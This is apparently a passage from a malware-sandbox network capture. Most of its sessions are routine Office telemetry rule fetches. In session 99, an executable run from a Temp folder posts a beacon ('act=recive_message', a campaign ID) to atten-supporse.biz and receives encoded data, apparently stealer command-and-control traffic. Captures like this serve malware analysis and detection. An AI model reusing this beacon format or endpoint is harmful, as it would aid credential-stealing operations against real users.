8eeef5b75ba1c336-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1618&rtt_var=617&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1759036&cwnd=244&unsent_bytes=0&cid=48ceb3821b6b2bd1&ts=718&x=0"
2024-12-08 18:53:43 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-08 18:53:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.4	49865	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:44 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:44 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:44 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: f6e8f8d1-c01e-000b-4709-49e255000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185344Z-r1cf579d778dndrdhC1EWR4b2400000005wg00000000301z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:44 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.4	49866	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:44 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:44 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:44 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: 44286e75-701e-0032-5705-48a540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185344Z-r1cf579d778t5c2lhC1EWRce3w00000006y00000000009b1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:44 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.4	49864	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:44 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:44 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:44 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: 09d70899-501e-008c-3f6d-49cd39000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185344Z-r1cf579d778xq4f9hC1EWRx41g00000005w000000000bbmf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:44 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.4	49867	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:44 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:44 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:44 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: 32ce5259-b01e-003e-4804-488e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185344Z-r1cf579d778dc6d7hC1EWR2vs800000006x00000000018yu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:44 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.4	49868	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:44 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:44 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:44 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: 83126420-c01e-002b-5c77-496e00000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185344Z-r1cf579d778xq4f9hC1EWRx41g0000000600000000005p0s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:44 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	49870	104.21.16.9	443	8128	C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:45 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: atten-supporse.biz
2024-12-08 18:53:45 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-08 18:53:45 UTC	1015	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=38pff8hfm94amqviom3d5l2kgd; expires=Thu, 03-Apr-2025 12:40:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PxTs7JWA7%2BJmy1xzlZfbC1U%2FOyK1H5HIn4y7gHVNV%2BYMUFutcp4AFcy4hyDg1isnjFcymygjuuzZSX95Oz6x5XOYq9UQXbRXf2Wj1W3mCK0kctNKJvW7OLVF1uqUDruj3fXC3uw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eeef5c6399041b5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2386&min_rtt=2377&rtt_var=898&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=955&delivery_rate=1228439&cwnd=207&unsent_bytes=0&cid=7bea7c74be5b8d8d&ts=851&x=0"
2024-12-08 18:53:45 UTC	354	IN	Data Raw: 31 64 32 30 0d 0a 73 74 43 76 70 4b 44 64 4c 41 34 41 78 32 71 2b 63 52 72 74 4b 49 66 61 59 39 68 6a 2b 45 53 67 76 54 41 74 67 36 61 44 4d 31 2f 4a 38 74 6d 47 6d 75 6b 41 4c 48 4f 69 53 49 51 46 61 4a 68 4e 71 2f 67 43 76 45 48 43 49 73 48 52 51 30 69 76 68 50 56 65 66 59 69 32 7a 73 6a 54 75 41 41 73 5a 62 39 49 68 43 70 68 7a 30 33 70 2b 46 6e 36 42 70 49 6d 77 64 46 53 54 4f 6a 4a 38 31 38 38 32 72 7a 49 7a 4d 57 2b 53 47 39 73 71 67 2f 62 46 48 75 48 52 75 36 33 43 37 56 42 31 47 62 46 78 78 49 58 6f 65 76 6d 52 7a 37 2f 73 64 7a 50 67 71 41 41 64 53 4b 69 42 4a 78 4c 4f 49 78 4e 35 62 59 46 76 41 69 51 4c 4d 6a 5a 55 30 6e 70 31 75 70 56 4e 39 71 79 79 38 33 50 74 31 78 69 5a 71 30 45 33 52 35 37 7a 77 53 6c 76 78 6e 36 57 64 70 31 38 4e 78 44 58 Data Ascii: 1d20stCvpKDdLA4Ax2q+cRrtKIfaY9hj+ESgvTAtg6aDM1/J8tmGmukALHOiSIQFaJhNq/gCvEHCIsHRQ0ivhPVefYi2zsjTuAAsZb9IhCphz03p+Fn6BpImwdFSTOjJ81882rzIzMW+SG9sqg/bFHuHRu63C7VB1GbFxxIXoevmRz7/sdzPgqAAdSKiBJxLOIxN5bYFvAiQLMjZU0np1upVN9qyy83Pt1xiZq0E3R57zwSlvxn6Wdp18NxDX
2024-12-08 18:53:45 UTC	1369	IN	Data Raw: 73 6b 35 2b 61 71 34 44 32 51 46 7a 68 6b 66 6f 75 41 79 77 44 70 6b 6d 78 64 56 59 51 4f 76 41 37 46 77 37 30 4c 4b 4e 69 49 4b 34 56 69 77 36 35 53 76 5a 41 33 2b 44 58 4b 65 43 51 61 56 50 67 32 62 46 30 78 49 58 6f 63 7a 6b 55 6a 37 62 76 63 37 4f 79 61 31 4f 66 6d 53 6f 44 63 34 56 66 59 46 41 35 71 6f 4c 74 41 65 5a 4c 38 6e 57 56 30 6a 6c 68 4b 38 52 4f 73 6a 79 6c 59 62 6a 73 6b 56 67 61 4c 49 49 6e 41 77 32 6c 67 72 69 74 45 48 69 51 5a 34 6e 78 74 35 57 51 65 2f 41 37 56 63 7a 33 62 33 4c 7a 4d 4b 34 52 47 52 71 70 41 58 58 48 48 69 4b 52 2b 47 2b 44 62 73 45 32 6d 69 43 32 45 6f 50 75 59 54 50 56 6a 37 43 38 50 6a 46 7a 4c 46 4a 65 69 4b 36 52 73 56 54 66 34 4d 4b 76 66 67 50 76 77 36 49 4a 39 44 61 58 46 33 74 77 65 64 63 50 74 36 79 79 4d 48 Data Ascii: sk5+aq4D2QFzhkfouAywDpkmxdVYQOvA7Fw70LKNiIK4Viw65SvZA3+DXKeCQaVPg2bF0xIXoczkUj7bvc7Oya1OfmSoDc4VfYFA5qoLtAeZL8nWV0jlhK8ROsjylYbjskVgaLIInAw2lgritEHiQZ4nxt5WQe/A7Vcz3b3LzMK4RGRqpAXXHHiKR+G+DbsE2miC2EoPuYTPVj7C8PjFzLFJeiK6RsVTf4MKvfgPvw6IJ9DaXF3twedcPt6yyMH
2024-12-08 18:53:45 UTC	1369	IN	Data Raw: 69 4b 36 52 73 56 54 66 34 4d 4b 76 66 67 4d 73 67 53 66 4b 63 50 56 58 45 72 72 79 4f 6c 66 50 73 4b 39 79 63 62 4f 74 30 52 68 62 4b 45 41 31 52 68 7a 69 55 72 6b 73 6b 48 30 51 5a 30 2b 67 6f 63 53 65 2b 62 49 37 46 35 2f 35 62 48 44 79 4d 57 70 44 6e 4d 73 76 45 6a 62 48 7a 6a 58 43 75 6d 78 41 62 45 4c 6e 69 62 46 30 6c 64 4d 35 73 66 73 56 6a 66 65 74 63 6e 4b 79 37 4a 49 62 47 57 68 44 63 34 57 63 59 4e 47 70 66 5a 42 76 52 6e 61 66 6f 4c 77 56 56 6e 69 36 2b 4a 41 4e 4a 43 74 67 39 2b 43 75 45 49 73 4f 75 55 50 32 52 74 7a 69 55 4c 6c 71 67 53 30 43 70 73 73 78 4e 35 66 51 2b 66 45 34 46 45 37 33 4c 4c 4b 77 64 43 74 53 32 70 77 72 30 69 53 55 33 2b 58 43 72 33 34 4e 36 6f 57 69 7a 43 41 36 6c 46 42 37 38 50 33 45 53 4b 65 71 34 33 42 7a 76 38 57 Data Ascii: iK6RsVTf4MKvfgMsgSfKcPVXErryOlfPsK9ycbOt0RhbKEA1RhziUrkskH0QZ0+gocSe+bI7F5/5bHDyMWpDnMsvEjbHzjXCumxAbELnibF0ldM5sfsVjfetcnKy7JIbGWhDc4WcYNGpfZBvRnafoLwVVni6+JANJCtg9+CuEIsOuUP2RtziULlqgS0CpssxN5fQ+fE4FE73LLKwdCtS2pwr0iSU3+XCr34N6oWizCA6lFB78P3ESKeq43Bzv8W
2024-12-08 18:53:45 UTC	1369	IN	Data Raw: 58 58 48 48 4f 64 53 75 69 38 44 62 34 4a 6b 53 79 43 6b 52 4a 49 2b 59 53 35 45 51 6a 64 76 63 33 46 31 50 39 52 49 6e 76 6c 44 39 42 54 49 4d 39 47 36 37 67 4f 74 67 32 52 4c 73 50 54 58 45 6a 6b 7a 65 6c 5a 4c 39 47 32 78 63 66 4d 73 45 39 6f 5a 36 41 4d 32 78 64 2b 67 41 71 72 2b 41 61 69 51 63 4a 6d 37 66 68 6e 44 63 44 2b 6f 55 35 7a 79 66 4c 4b 79 6f 4c 6e 44 6d 42 68 71 51 44 54 46 58 47 44 51 4f 79 7a 44 62 45 46 6c 69 2f 48 32 56 4e 4b 35 4d 58 6c 58 54 66 57 73 63 37 4a 7a 62 42 47 4c 43 7a 6c 44 38 52 54 49 4d 39 76 38 72 4d 50 76 45 47 46 61 4e 75 66 56 55 4f 68 6e 4b 46 64 4e 4e 61 30 79 4d 72 44 75 55 5a 70 61 71 45 4a 32 68 56 37 67 45 37 67 75 51 36 2b 44 5a 51 73 77 39 35 65 52 4f 37 50 35 42 46 7a 6b 4c 58 56 68 70 72 2f 66 32 39 30 73 Data Ascii: XXHHOdSui8Db4JkSyCkRJI+YS5EQjdvc3F1P9RInvlD9BTIM9G67gOtg2RLsPTXEjkzelZL9G2xcfMsE9oZ6AM2xd+gAqr+AaiQcJm7fhnDcD+oU5zyfLKyoLnDmBhqQDTFXGDQOyzDbEFli/H2VNK5MXlXTfWsc7JzbBGLCzlD8RTIM9v8rMPvEGFaNufVUOhnKFdNNa0yMrDuUZpaqEJ2hV7gE7guQ6+DZQsw95eRO7P5BFzkLXVhpr/f290s
2024-12-08 18:53:45 UTC	1369	IN	Data Raw: 30 7a 77 53 6c 76 78 6e 36 57 64 6f 49 79 63 78 46 54 4f 2f 50 39 30 70 39 7a 2f 7a 55 68 73 57 7a 44 6a 51 69 70 67 50 58 46 33 69 44 53 75 47 31 41 61 67 4f 6e 53 48 4c 31 45 42 46 35 73 50 71 57 54 62 66 74 4e 2f 4b 7a 4b 31 4c 66 6e 44 6c 52 70 77 55 59 4d 38 53 70 59 34 47 71 68 47 5a 5a 50 50 4a 55 56 6e 71 79 65 30 52 49 70 36 72 6a 63 48 4f 2f 78 59 73 5a 4b 6f 42 33 78 78 35 68 6b 62 6f 76 51 69 2f 41 4a 77 69 79 4e 56 53 53 65 66 46 35 46 73 2b 30 62 6a 45 77 63 71 34 54 58 34 69 36 30 6a 62 43 7a 6a 58 43 73 79 2f 45 37 51 52 32 6a 6d 4d 78 68 4a 49 37 59 53 35 45 54 6e 61 76 63 6e 42 7a 72 6c 4c 61 6d 2b 6b 42 39 30 54 64 34 74 42 37 4c 34 41 74 77 53 58 49 74 44 56 57 55 44 74 7a 65 31 63 66 5a 37 79 79 74 36 43 35 77 35 64 62 36 73 47 32 77 Data Ascii: 0zwSlvxn6WdoIycxFTO/P90p9z/zUhsWzDjQipgPXF3iDSuG1AagOnSHL1EBF5sPqWTbftN/KzK1LfnDlRpwUYM8SpY4GqhGZZPPJUVnqye0RIp6rjcHO/xYsZKoB3xx5hkbovQi/AJwiyNVSSefF5Fs+0bjEwcq4TX4i60jbCzjXCsy/E7QR2jmMxhJI7YS5ETnavcnBzrlLam+kB90Td4tB7L4AtwSXItDVWUDtze1cfZ7yyt6C5w5db6sG2w
2024-12-08 18:53:45 UTC	1369	IN	Data Raw: 34 4c 55 4d 74 77 4b 63 49 4d 6e 54 51 45 62 68 78 2b 6f 52 63 35 43 31 31 59 61 61 2f 32 31 37 64 4b 38 50 30 41 56 7a 6a 6b 6e 7a 74 52 48 36 54 39 6f 33 78 63 34 53 46 2f 66 55 39 6c 59 69 6e 71 75 4e 77 63 37 2f 46 69 78 6b 72 41 37 62 46 58 61 64 54 2b 4f 33 44 72 4d 49 6e 69 37 42 33 31 5a 4c 35 73 48 69 58 54 62 58 73 63 4c 43 79 37 46 48 59 79 4c 72 53 4e 73 4c 4f 4e 63 4b 78 4b 4d 43 74 67 7a 61 4f 59 7a 47 45 6b 6a 74 68 4c 6b 52 4d 64 36 33 7a 63 7a 45 75 30 74 71 61 4b 41 49 31 78 42 33 69 30 7a 68 74 77 47 78 43 4a 73 67 78 39 56 5a 53 65 7a 48 35 31 64 39 6e 76 4c 4b 33 6f 4c 6e 44 6b 78 35 71 41 54 62 55 32 66 42 55 36 57 2f 44 66 70 5a 32 69 33 4f 32 31 56 50 37 4d 66 70 56 44 6e 61 74 38 33 4f 30 4c 64 4f 61 33 43 33 43 4e 55 57 64 49 78 Data Ascii: 4LUMtwKcIMnTQEbhx+oRc5C11Yaa/217dK8P0AVzjknztRH6T9o3xc4SF/fU9lYinquNwc7/FixkrA7bFXadT+O3DrMIni7B31ZL5sHiXTbXscLCy7FHYyLrSNsLONcKxKMCtgzaOYzGEkjthLkRMd63zczEu0tqaKAI1xB3i0zhtwGxCJsgx9VZSezH51d9nvLK3oLnDkx5qATbU2fBU6W/DfpZ2i3O21VP7MfpVDnat83O0LdOa3C3CNUWdIx
2024-12-08 18:53:45 UTC	265	IN	Data Raw: 37 6b 52 6d 53 6e 54 34 52 49 58 2b 50 71 68 57 69 76 58 6f 73 37 51 79 62 4a 43 66 56 7a 6c 55 49 68 42 4b 74 30 59 74 36 64 42 70 54 37 55 5a 73 4f 66 43 6e 62 34 68 50 63 52 5a 59 4c 38 6a 64 53 43 35 77 34 72 59 62 63 61 32 68 42 75 6a 41 33 62 68 69 61 73 43 35 30 32 78 63 68 64 44 36 2b 45 37 68 46 6c 36 66 4c 45 77 64 6d 75 57 47 46 79 6f 6b 6a 6a 58 54 69 58 43 72 33 34 4e 4c 6b 50 6c 43 48 55 7a 68 39 6f 39 38 37 6d 51 54 72 48 76 59 32 49 67 72 6b 4f 4e 44 48 72 53 4e 67 43 4f 4e 63 61 74 2b 4e 55 36 56 62 4b 64 4e 32 52 53 77 2f 33 68 4c 6b 44 63 35 43 67 6a 5a 36 43 2b 45 31 2b 63 4b 4d 4c 79 68 41 2f 73 58 54 43 6f 67 79 38 46 6f 73 59 2f 4e 68 49 51 75 66 54 38 42 30 6f 30 37 7a 44 77 64 54 2f 41 43 78 74 35 56 44 6c 55 7a 44 50 64 61 76 34 Data Ascii: 7kRmSnT4RIX+PqhWivXos7QybJCfVzlUIhBKt0Yt6dBpT7UZsOfCnb4hPcRZYL8jdSC5w4rYbca2hBujA3bhiasC502xchdD6+E7hFl6fLEwdmuWGFyokjjXTiXCr34NLkPlCHUzh9o987mQTrHvY2IgrkONDHrSNgCONcat+NU6VbKdN2RSw/3hLkDc5CgjZ6C+E1+cKMLyhA/sXTCogy8FosY/NhIQufT8B0o07zDwdT/ACxt5VDlUzDPdav4
2024-12-08 18:53:45 UTC	1369	IN	Data Raw: 31 30 36 38 0d 0a 30 56 78 49 39 39 57 73 64 69 66 64 74 4e 72 58 67 76 45 4f 61 69 4c 39 57 4a 4a 54 66 4a 34 4b 76 65 68 54 34 56 54 4a 63 5a 4b 4e 54 51 48 34 68 50 63 52 5a 59 4c 38 6a 64 53 43 35 77 34 72 59 62 63 61 32 68 42 75 6a 41 33 62 68 69 2b 39 42 35 38 68 30 70 31 38 52 50 58 44 6f 52 39 39 33 2f 4b 56 2f 34 4c 33 44 6c 4d 73 35 52 43 63 53 7a 69 36 53 65 75 32 42 71 77 51 31 77 6a 46 32 56 64 49 38 59 62 50 57 69 6e 58 38 6f 4f 47 78 50 38 57 50 43 7a 6c 44 4d 31 54 49 4e 38 59 76 75 31 53 37 56 48 49 4f 59 7a 47 45 6c 6d 68 6e 4c 4d 66 66 63 4c 79 6c 59 61 46 76 46 78 2b 5a 4b 59 65 33 31 52 47 73 55 6e 7a 74 51 36 78 41 4b 51 59 37 4e 4a 54 54 4f 2b 47 30 45 63 77 77 4c 48 49 77 66 79 42 51 47 74 32 6f 67 62 61 45 7a 6a 42 43 75 72 34 57 Data Ascii: 10680VxI99WsdifdtNrXgvEOaiL9WJJTfJ4KvehT4VTJcZKNTQH4hPcRZYL8jdSC5w4rYbca2hBujA3bhi+9B58h0p18RPXDoR993/KV/4L3DlMs5RCcSzi6Seu2BqwQ1wjF2VdI8YbPWinX8oOGxP8WPCzlDM1TIN8Yvu1S7VHIOYzGElmhnLMffcLylYaFvFx+ZKYe31RGsUnztQ6xAKQY7NJTTO+G0EcwwLHIwfyBQGt2ogbaEzjBCur4W
